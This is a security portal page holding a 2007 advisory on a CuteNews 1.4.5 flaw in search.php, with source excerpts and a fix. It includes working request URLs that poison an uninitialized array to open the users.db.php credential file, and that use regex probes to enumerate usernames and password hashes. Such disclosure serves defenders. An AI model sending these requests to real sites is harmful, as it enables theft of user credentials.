Waraxe IT Security Portal
Login or Register
October 6, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 79
Members: 0
Total: 79
Full disclosure
Some SIM / USIM card security (and ecosystem) info
SEC Consult SA-20240930-0 :: Local Privilege Escalation via MSI Installer in Nitro PDF Pro (CVE-2024-35288)
Backdoor.Win32.Benju.a / Unauthenticated Remote CommandExecution
Backdoor.Win32.Prorat.jz / Remote Stack Buffer Overflow (SEH)
Backdoor.Win32.Amatu.a / Remote Arbitrary File Write (RCE)
Backdoor.Win32.Agent.pw / Remote Stack Buffer Overflow (SEH)
Backdoor.Win32.Boiling / Remote Command Execution
Defense in depth -- the Microsoft way (part 88): a SINGLEcommand line shows about 20, 000 instances of CWE-73
SEC Consult SA-20240925-0 :: Uninstall Password Bypass in BlackBerry CylanceOPTICS Windows Installer Package (CVE-2024-35214)
Apple iOS 17.2.1 - Screen Time Passcode Retrieval (MitigationBypass)
CyberDanube Security Research 20240919-0 | Multiple Vulnerabilities in Netman204
Submit Exploit CVE-2024-42831
Stored XSS in "Edit Profile" - htmlyv2.9.9
Stored XSS in "Menu Editor" - htmlyv2.9.9
Backdoor.Win32.BlackAngel .13 / Unauthenticated Remote CommandExecution
[waraxe-2007-SA#060] - Sensitive info disclosure in CuteNews <= 1.4.5





Author: Janek Vind "waraxe"
Date: 24. December 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-60.html


Vulnerable software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Cute news is a powerful and easy to use news management system that
uses flat files to store its database. It supports commenting,
archives, search function, file upload management, backup & restore,
IP banning, flood protection ...

Homepage: http://cutephp.com/


Vulnerabilities: Sensitive info disclosure in "search.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Let's look @ "search.php" source code ~line 158:

-------------------------->[source code]<----------------------------
if($dosearch == "yes")
{
...
$story = trim($story);

if($search_in_archives){
...
$files_arch[] = "$cutepath/data/archives/$file";
...
$files_arch[] = "$cutepath/data/news.txt";
------------------------->[/source code]<----------------------------


Hmm, let's see - "$files_arch" array is uninitialized before using
for file pathes storing. How about good old variable poisoning?


http://localhost/cutenews.1.4.5/search.php?dosearch=yes&files_arch[]=waraxe

and nice error message appears:

Warning: file(waraxe) [function.file]: failed to open stream:
No such file or directory in
C:apache_wwwrootcutenews.1.4.5search.php on line 188

So it seems possible to trick this search script for opening arbitrary
local files. How about "users.db.php", which contains user credentials?

Testing:
http://localhost/cutenews.1.4.5/search.php?dosearch=yes&files_arch[]=./data/users.db.php

No error messages! Search script will open user database file and will
try to parse it. Is it exploitable?

Let's have second look @ vulnerable script source:

-------------------------->[source code]<----------------------------
foreach($files_arch as $file)
{
...
$all_news_db = file("$file");
foreach($all_news_db as $news_line){
$news_db_arr = explode("|",$news_line);
...
if($title and @preg_match("/$title/i", "$news_db_arr[2]")){ $ftitle = TRUE; }
if($user and @preg_match("/$user/i", "$news_db_arr[1]")){ $fuser = TRUE; }
if($story and (@preg_match("/$story/i", "$news_db_arr[4]") ...
...
if($fdate and $ftitle and $fuser and $fstory){ $found_arr[$news_db_arr[0]] = $archive; }
...
echo"<br /><b>Founded News articles [". count($found_arr)."]:</b><br />";
------------------------->[/source code]<----------------------------

Title, user and story variables are coming directly from GPC, so another
insecurity feature - regex manipulation - is available for us to exploit.

Let's assume, that username "john" is non valid and "waraxe" is valid
username in current Cutenews installation.

http://localhost/cutenews.1.4.5/search.php?dosearch=yes&title=waraxe&files_arch[]=./data/users.db.php

... and we see "Founded News articles [1]"
Now let's try nonexistent user:
http://localhost/cutenews.1.4.5/search.php?dosearch=yes&title=john&files_arch[]=./data/users.db.php
... and response is different: "Founded News articles [0]"
We have just seen, how username can be "pinged" from database file.

Now, let's get more serious:

http://localhost/cutenews.1.4.5/search.php?dosearch=yes&story=^[a-f0-9]{32}$&files_arch[]=./data/users.db.php

... and we see "Founded News articles [5]", which shows users count
in database with standard md5 hashes.

Sorry about long and boring storytelling, i will make it short now:
by using security vulnerabilities described above any attacker can
retrieve usernames and password md5 hashes from userdata file within
minutes. I have written two PoC scripts, "cuteuser.php" and "cutemd5.php",
which will allow to enumerate usernames and fetch password hashes from
most Cutenews targets as for today. Exploitable is newest version 1.4.5,
but older versions are vulnerable too, including CuteNews v1.3.1

Exploits are available at http://www.waraxe.us/tools/

Questions about this advisory or PoC scripts can be asked in forum:

http://www.waraxe.us/forums.html

//-----> See ya soon and have a nice day ;) <-----//

How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Initialize variables before use! In this way php variable poisoning
related security issues can be mitigated.


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and anyone else who know me!
Greetings to Raido Kerna.
Tervitusi Torufoorumi rahvale!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/


Shameless advertise:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Biography Database - http://www.biosaxe.com/
Old books online - http://www.oldreadings.com/

---------------------------------- [ EOF ] --------------------------









Copyright © by Waraxe IT Security Portal All Right Reserved.

Published on: 2007-12-23 (12605 reads)

[ Go Back ]
Top members by posts
waraxe  waraxe - 2407
vince213333  vince213333 - 737
pexli  pexli - 665
Mullog  Mullog - 540
demon  demon - 485
shai-tan  shai-tan - 477
LINUX  LINUX - 404
Cyko  Cyko - 375
tsabitah  tsabitah - 328
y3dips  y3dips - 281
Cybercrime news
Ransomware Hits Critical Infrastructure Hard, Costs Adding Up
Ransowmare Crew Infects 100+ Orgs Monthly With New MedusaLocker Variant
Evil Corp/REvil Malware Crime Group Outed As Family Affair
More LockBit Hackers Arrested, Unmasked As Servers Siezed
Ransomware Forces Hospital To Turn Away Ambulances
Ransomware Gang Using Stolen MS Entra ID Creds To Bust Into Cloud
RansomHub Genius Tries To Put The Squeeze On Delaware Libraries
US Indicts Two Over Socially Engineered $230M+ Crypto Heist
Life Imitates xkcd Comic As Florida Gang Beats Crypto Password From Retiree
Cyber Crooks Strut Away With Haute Couture Harvey Nichols Data
Marko Polo Hackers Found To Be Running Dozens Of Scams
Hackers Demand $6 Million From Seattle Airport Operators
Recent WhatsUp Gold Vulnerabilities Possibly Exploited In Ransomware Attacks
Cops Across The World Arrest 51 In Orchestrated Takedown Of Ghost Crime Platform
France Uses Tough, Untested Cybercrime Law To Target Durov
Ransomware Group Leaks Data Stolen From Kawasaki Motors
Old WHOIS Domain Could Have Issued Fraudulent TLS/SSL Certs
Hackers Use Cloud Services To Target Financial And Insurance Firms
When You Pay A Ransom And The Decryptor Doesn't Work
Crypto Scams Rake In $5.6B A Year For Lowlifes, FBI Says
Cisco Merch Shoppers Stung In Magecart Attack
Planned Parenthood Confirms Attack Claimed By RansomHub
Russian Doppelganger Campaign Exposed
FBI: North Korea Aggressively Hacking Cryptocurrency Firms
RansomHub Claims 210 Victims In Just 6 Months
Hacker news
LLM Hijacking Of Cloud Infrastructure Uncovered By Researchers
Thousands Of Linux Systems Infected By Malware Since 2021
DOJ, Microsoft Take Down 107 Russian-Backed Star Blizzards Domains
Ransowmare Crew Infects 100+ Orgs Monthly With New MedusaLocker Variant
Ivanti EPM Vulnerability Exploited In The Wild
Zero-Day Breach At Rackspace Sparks Vendor Blame Game
More LockBit Hackers Arrested, Unmasked As Servers Siezed
T-Mobile Pays $16 Million Fine For Three Years' Worth Of Data Breaches
Rackspace Internal Monitoring Web Servers Hit By Zero Day
WMDDH Discloses Data Breach Impacting 127,000
Cloud Threats Have Execs The Most Freaked Out Because They're Not Prepared
Five Eyes Agencies Release Guidance On Detecting Active Directory Intrusions
Ransomware Gang Using Stolen MS Entra ID Creds To Bust Into Cloud
Millions Of Kia Cars Were Vulnerable To Remote Hacking
Cyberattack Investigated At UK's Busiest Train Stations
China's Salt Typhoon Cyber Spies Are Deep Inside US ISPs
Deloitte Says No Threat To Sensitive Data After Hacker Claims Breach
RansomHub Genius Tries To Put The Squeeze On Delaware Libraries
Ivanti Warns Of Second CSA Vuln Exploited In Attacks
Cyberattack On Kansas Water Treatment Facility Investigated By Feds
Move Over, Cobalt Strike. Splinter's The New Post Exploit Menace In Town
US Indicts Two Over Socially Engineered $230M+ Crypto Heist
China Urges Vigilance Against Taiwanese Cyberattacks
Secret Calculator Hack Brings ChatGPT To The TI-84, Enabling Easy Cheating
Exploiting Exploiting Exchange PowerShell After ProxyNotShell: Part 3 – DLL Loading Chain for RCE
Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.043 Seconds